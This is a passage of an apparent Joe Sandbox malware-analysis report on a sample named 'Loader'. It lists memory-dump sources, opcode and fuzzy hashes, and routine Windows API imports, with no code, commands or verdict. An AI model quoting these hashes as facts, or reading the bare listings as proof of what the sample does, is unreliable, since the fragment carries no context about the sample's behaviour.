                                                                                              • Instruction ID: 3403b3ec7746e68af654632c9af74043e608063036dd4035708f9e3e28b2fa63
                                                                                              • Opcode Fuzzy Hash: 3efc317941df68850e947550c7d882803de32b64531bf8ce015460ea843ce15c
                                                                                              • Instruction Fuzzy Hash: 3341D9A46047A08BD3328B3694A17A3BFE1AF53304F58499ED5E71B343D3396509CB5A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: K7
                                                                                              • API String ID: 2994545307-4265185514
                                                                                              • Opcode ID: e3e8edb9ba0397faa54805ff5563bb50fae93839d751c6f7e7c04a52a825659c
                                                                                              • Instruction ID: a4db1068415fadc9cdd31992e2248126b9c66ec4bc7dae9dee6f407cf00c46ab
                                                                                              • Opcode Fuzzy Hash: e3e8edb9ba0397faa54805ff5563bb50fae93839d751c6f7e7c04a52a825659c
                                                                                              • Instruction Fuzzy Hash: B25102742093409BE7288B21D9817BBB7E3FF95714F24452DE28207272D779AC86CB4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: 5|iL
                                                                                              • API String ID: 2994545307-1880071150
                                                                                              • Opcode ID: 2be1c1d616be887a816f25e25ef5df8779d6c425ff86262c209e95e4619398c4
                                                                                              • Instruction ID: 3e5c4b9a5fa6a99628b6776850f7b1d5136951131d8e647e83234ccaa70e9d83
                                                                                              • Opcode Fuzzy Hash: 2be1c1d616be887a816f25e25ef5df8779d6c425ff86262c209e95e4619398c4
                                                                                              • Instruction Fuzzy Hash: C6415A36744300ABE324DF29DD80B7BF7E6EBC9301F69453DE585A3251DBB4A904C649
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \=m?
                                                                                              • API String ID: 0-3927515410
                                                                                              • Opcode ID: 5c3c32c8e603ce835200e274f53698adb9d5c8ffaff33d9aaf40498a7b314021
                                                                                              • Instruction ID: ebf55b8466a4157a73dd5975e4a6720e27fa5c1b227ab0e596c2bf0bf79c038b
                                                                                              • Opcode Fuzzy Hash: 5c3c32c8e603ce835200e274f53698adb9d5c8ffaff33d9aaf40498a7b314021
                                                                                              • Instruction Fuzzy Hash: 8741D4B4A083169BD710DF14D85136BB3F0EF82314F54892DF9898B381EB78C955DB8A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: @
                                                                                              • API String ID: 2994545307-2766056989
                                                                                              • Opcode ID: 104b9a65bb311a1db602a386b8eee6bf3edd384dbf4f49959effe9b44746b6d3
                                                                                              • Instruction ID: d9348c25faa97a0893fe4cf35a4a77d8276ccc20bdb55aeb94306999975d0b26
                                                                                              • Opcode Fuzzy Hash: 104b9a65bb311a1db602a386b8eee6bf3edd384dbf4f49959effe9b44746b6d3
                                                                                              • Instruction Fuzzy Hash: B24122729053109BE3148B24CC41B6BBBE2FFD9318F59851DF989673A0E7B99904C78A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: XTx
                                                                                              • API String ID: 0-3664917863
                                                                                              • Opcode ID: b8e12908a26261a320ac89487cc04741ef1c8959fb397e25057107e25354131c
                                                                                              • Instruction ID: 9758cd383cbc4e30398dce3ef6afc1f5afbf0b8fd5ad5c6b590df952c331867f
                                                                                              • Opcode Fuzzy Hash: b8e12908a26261a320ac89487cc04741ef1c8959fb397e25057107e25354131c
                                                                                              • Instruction Fuzzy Hash: 4C01D67464D340ABD360CF14D480BABB3E6FB8A310F10942DE0C483257DB79E9568B5B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 779545d2fe4942f42198e2120b046c0a41253dc1da7e6b9130b96e7d66a0434c
                                                                                              • Instruction ID: 87fa2eb4765b8377b81591044aa21b33e97211d987ff3035398b58929221445b
                                                                                              • Opcode Fuzzy Hash: 779545d2fe4942f42198e2120b046c0a41253dc1da7e6b9130b96e7d66a0434c
                                                                                              • Instruction Fuzzy Hash: 91B16672A047209BC710DF28D85277BB3E1EF95364F99942EE8C687391E778D801C79A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a91093ebc78a1acf2f137e19cf6a586fc3d47acfc34272f3810e268d6f996fd
                                                                                              • Instruction ID: 97fb6331afa9d5b2e72a0c70b6d856a2f439593200af1677436a1fab82c961e3
                                                                                              • Opcode Fuzzy Hash: 9a91093ebc78a1acf2f137e19cf6a586fc3d47acfc34272f3810e268d6f996fd
                                                                                              • Instruction Fuzzy Hash: 146126B1E1021187CB249F28C8A26B7B7B1FF95314F198229E8959B3C1E7399D45C3D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b16a1d0a6e41c3eb88122fde69921289e4a8ef302036d83e0dc9ebf55b30f31f
                                                                                              • Instruction ID: a99eebf4cc5ff7592fa2c02fe8b88a482f2c5e79d402392339093b5d4a57019e
                                                                                              • Opcode Fuzzy Hash: b16a1d0a6e41c3eb88122fde69921289e4a8ef302036d83e0dc9ebf55b30f31f
                                                                                              • Instruction Fuzzy Hash: CE91D076D00215CBDB14DF54D862ABEB3B0FF4A314F090069E946AB391E73AAD41CB99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a4e11f7717233bd428ccdc22a27a6da1a37da6cdd3a93533b86fdb972afce09
                                                                                              • Instruction ID: f308db6ec8f84ea8b5b58c29a0b76a40e3800f2521e77405773cac6c4f72ef52
                                                                                              • Opcode Fuzzy Hash: 1a4e11f7717233bd428ccdc22a27a6da1a37da6cdd3a93533b86fdb972afce09
                                                                                              • Instruction Fuzzy Hash: FD6104B69083608BD710CF25D80222BBBF1FFD5304F58896EE8D59B391E7399905CB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 64fffffbce469819bdb1a2fca122c366e1734777715d23578e3c83055987fe4a
                                                                                              • Instruction ID: db6700f0b41101120d6c65c97ec77f2b3487af5ddac09f7af4dcbea1cdb7f869
                                                                                              • Opcode Fuzzy Hash: 64fffffbce469819bdb1a2fca122c366e1734777715d23578e3c83055987fe4a
                                                                                              • Instruction Fuzzy Hash: 4971F0F5A403288FDB14CF65C98279A7FB1FB49310F2A95ACD805AF35AD7748801CB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9e1f9c36d402f732c5c02caac65c83e8d0930f01023050289f59666d41e5663d
                                                                                              • Instruction ID: 816800942f8c8298ad4631cf468aa7cc5e622ce6c49daa882013a20ca6946c9c
                                                                                              • Opcode Fuzzy Hash: 9e1f9c36d402f732c5c02caac65c83e8d0930f01023050289f59666d41e5663d
                                                                                              • Instruction Fuzzy Hash: 5E618C34A083A15FC325CF29D890A2B7BE1AFA5314F4882AEE8D4473A3DA75DC01C756
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15de57377d28607905639b312d8fe7d5e82da97b07dbce84fbc16061c11e21bc
                                                                                              • Instruction ID: 85a7046368f41673eed8d1ddac9fee0d27394d916857723d64d820ca91703fde
                                                                                              • Opcode Fuzzy Hash: 15de57377d28607905639b312d8fe7d5e82da97b07dbce84fbc16061c11e21bc
                                                                                              • Instruction Fuzzy Hash: A751E976A18B254FC718CE2C9C5022BB3D29BC5211F4A863DEC669B386EF34EC15D785
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 1cfda60b0395abd42cb60c63deacccdb0d844202593929d2d6cc8eac1d1e3d90
                                                                                              • Instruction ID: 5ed8e28bba68d727b8825eb1adf3e03e7d10d226d3010a0375d8988c51d7785b
                                                                                              • Opcode Fuzzy Hash: 1cfda60b0395abd42cb60c63deacccdb0d844202593929d2d6cc8eac1d1e3d90
                                                                                              • Instruction Fuzzy Hash: 75410639F001219BEB058F55E8817EEB7F2EB99308F545069D041A7373C7695D0A8759
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6cc737e753ae299be771a6033fe8ee273ac72753f23915498294fb02e1c8ce69
                                                                                              • Instruction ID: f1161e050730514c5bff23caac1bed39a74a54e049a2a9ee7b08a3d1eabb15db
                                                                                              • Opcode Fuzzy Hash: 6cc737e753ae299be771a6033fe8ee273ac72753f23915498294fb02e1c8ce69
                                                                                              • Instruction Fuzzy Hash: 9C319C227952218FEB198A2898A15B7BBC5DF52360F9D837EC512073D2D61C8D09D36D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 4d89b7bbc62ae38d0b25c91385414e4cbfa86e52817a831eab97bec0a063149e
                                                                                              • Instruction ID: d7a6823c2f83f0c79939fe29bd0eb027ecbe73e209f0e155d9f26f087fa36e19
                                                                                              • Opcode Fuzzy Hash: 4d89b7bbc62ae38d0b25c91385414e4cbfa86e52817a831eab97bec0a063149e
                                                                                              • Instruction Fuzzy Hash: C221AD357042005BE7189F28CD90ABFB7E6EBCA314F58813DE54587361EB785905C755
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d020a18eca64efc37ff52bd6fa232c7099699a067d870ca0a074011afe307353
                                                                                              • Instruction ID: ad6d6a34f3bc26702e67d72789ccae2b993cf8e3816f802f49bc82cf64b2861f
                                                                                              • Opcode Fuzzy Hash: d020a18eca64efc37ff52bd6fa232c7099699a067d870ca0a074011afe307353
                                                                                              • Instruction Fuzzy Hash: AA11BBB8908390CAD7608F24D4912BBBBF0EF86344F66182DD4D9A7360E7358881DF0A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                              • Instruction ID: 9ca3eed3d90529c6fa8670ecaabb55e0c4610ac4c9156cb648ee0b257b753566
                                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                              • Instruction Fuzzy Hash: 5A11E933A052D54EC3168D3C8400566FFA31AB7234F5993DEF4B49B2D3EA268D8A8359
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a0ed89da4d194a249dea56de507e2c3448498b4160b0c89b700cdc7d46729f6e
                                                                                              • Instruction ID: c10e71c0090f43559d1783fb3a6e4e2b506a54cfb0658ceaebdf86414417e7fd
                                                                                              • Opcode Fuzzy Hash: a0ed89da4d194a249dea56de507e2c3448498b4160b0c89b700cdc7d46729f6e
                                                                                              • Instruction Fuzzy Hash: B8019EF1B00B1167DB20AE15B5C0B37A2A86F8470CF58443EE84557342EBB9FC45CA99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e889047ce47810d4ff93c1c95d59e27e0581495cb879a03c7c469d0568e2c49
                                                                                              • Instruction ID: 781bd291b065d37a2cd783415564ca8024faf01e41efabedd16a025487f4dfad
                                                                                              • Opcode Fuzzy Hash: 3e889047ce47810d4ff93c1c95d59e27e0581495cb879a03c7c469d0568e2c49
                                                                                              • Instruction Fuzzy Hash: 4E014C382153009BEB24CF15DC1177BB7E1FB8A314F14942DE1C693192DB7998A5974F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 222c4ae326d4d00b7d376adc150a56106c633bb8f427ba6c17028ce0dbcf85d5
                                                                                              • Instruction ID: 4fdfcec363e4b29463783485d583b444327f0c35f7d7c58c0aa9bf79320176c3
                                                                                              • Opcode Fuzzy Hash: 222c4ae326d4d00b7d376adc150a56106c633bb8f427ba6c17028ce0dbcf85d5
                                                                                              • Instruction Fuzzy Hash: 67E0027890D7419FD714CF18D58096AF7F4EB8A714F04A82DE999A7312D230EC149B1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9ce50fbbdd0b761b2b938ee50b79135e521bc0af6b7910d02ac7cfc2b4e04f30
                                                                                              • Instruction ID: b2588b393d12778ec27d30cb14f448fa524a6d510820c570cca846c061998388
                                                                                              • Opcode Fuzzy Hash: 9ce50fbbdd0b761b2b938ee50b79135e521bc0af6b7910d02ac7cfc2b4e04f30
                                                                                              • Instruction Fuzzy Hash: 6AD012B9E5C2008BD308CF14D891272F2F5FB8730AF01283CD29AD32A2CB3188428E0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8983d34e5b7c412fb6c2d56d221b7c5fe6e0f3e795b5749f7959153fdeef6342
                                                                                              • Instruction ID: dd4d07c8426cd46c9771d8fb13c3043fedb7cbd687317d03fad473cf8c087eb3
                                                                                              • Opcode Fuzzy Hash: 8983d34e5b7c412fb6c2d56d221b7c5fe6e0f3e795b5749f7959153fdeef6342
                                                                                              • Instruction Fuzzy Hash: FBC0123AA28040EFD7028F28E810432B278AB8730AF202838C156E3120C332EC40DA0C
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E64CB6
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E64CC4
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E64CD5
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E64CE6
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E64CF7
                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E64D08
                                                                                              • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00E64D19
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E64D2A
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00E64D3B
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E64D4C
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E64D5D
                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E64D6E
                                                                                              • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E64D7F
                                                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E64D90
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E64DA1
                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E64DB2
                                                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E64DC3
                                                                                              • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E64DD4
                                                                                              • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00E64DE5
                                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00E64DF6
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00E64E07
                                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00E64E18
                                                                                              • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00E64E29
                                                                                              • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00E64E3A
                                                                                              • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00E64E4B
                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00E64E5C
                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E64E6D
                                                                                              • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00E64E7E
                                                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E64E8F
                                                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E64EA0
                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00E64EB1
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E64EC2
                                                                                              • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00E64ED3
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E64EE4
                                                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00E64EF5
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00E64F06
                                                                                              • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00E64F17
                                                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00E64F28
                                                                                              • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00E64F39
                                                                                              • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00E64F4A
                                                                                              • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00E64F5B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                              • API String ID: 667068680-295688737
                                                                                              • Opcode ID: 0ccc923999a738c5421e1871643c16f76cd43b5ed43f44c69dd01ca9ba76eea2
                                                                                              • Instruction ID: fbb3c6adcd2cf170df4c1460f3ab6b59fed62b981590b2097c6802d1234e9b81
                                                                                              • Opcode Fuzzy Hash: 0ccc923999a738c5421e1871643c16f76cd43b5ed43f44c69dd01ca9ba76eea2
                                                                                              • Instruction Fuzzy Hash: 40618771952750AFD704EFF6AC4D8C63BACAF49705310941AB21DF3262EBB460C99F61
                                                                                              APIs
                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00E691F2
                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00E69300
                                                                                              • CatchIt.LIBVCRUNTIME ref: 00E69351
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00E69452
                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00E6946D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                              • String ID: @]$csm$csm$csm
                                                                                              • API String ID: 4119006552-4081610302
                                                                                              • Opcode ID: dc0263590cde9a07dcd0203a4825e88a9839728c4926a742acdfd5c035935c57
                                                                                              • Instruction ID: b3abd649bf5002285ab26d587a3d859a8f3e02726442308ede6c085739c7cf6b
                                                                                              • Opcode Fuzzy Hash: dc0263590cde9a07dcd0203a4825e88a9839728c4926a742acdfd5c035935c57
                                                                                              • Instruction Fuzzy Hash: B6B1AF31880209EFCF18DFA4E9819AEB7B9FF04394B146159E8117B253DB31DA52CB91
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                              • String ID:
                                                                                              • API String ID: 127012223-0
                                                                                              • Opcode ID: e2150e0ae6830940b0885c5a1286a7e5d222339add3169d02f17ca5b6baaf659
                                                                                              • Instruction ID: b44dc9c8227f2586e97e11b0ec45dbdcf58a42fe87bf52685ffd50534eda8708
                                                                                              • Opcode Fuzzy Hash: e2150e0ae6830940b0885c5a1286a7e5d222339add3169d02f17ca5b6baaf659
                                                                                              • Instruction Fuzzy Hash: E771E372940205EBDF319E64DC81BAE7BEA9F49354F28A015E91CF7281E735DD408B60
                                                                                              APIs
